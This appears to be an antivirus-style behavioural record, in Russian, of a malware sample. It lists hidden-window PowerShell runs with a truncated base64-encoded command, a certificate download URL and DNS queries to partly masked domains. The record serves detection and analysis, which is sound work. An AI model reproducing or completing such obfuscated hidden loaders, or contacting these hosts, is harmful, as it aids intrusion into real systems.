Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAASwBnAGwAbABsAGEAbQB0AHEAZwBnAHMAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8AQwBmAG8AcwByAGwAdgB4AGMAaABnAHoAcAAgACMAPgAgACQARwBzAHYAeQBkAGYAbAB3AD0AJwBY...
- http://ca#####.##gitalcertvalidation.com/TrustAsiaTLSRSACA.crt
- DNS ASK dd##s.net
- DNS ASK ca#####.##gitalcertvalidation.com
- DNS ASK ur####hfairy.com
- DNS ASK de#.#teamymm.ca
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAASwBnAGwAbABsAGEAbQB0AHEAZwBnAHMAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8AQwBmAG8AcwByAGwAdgB4AGMAaABnAHoAcAAgACMAPgAgACQARwBzAHYAeQBkAGYAbAB3AD0AJwBY...' (со скрытым окном)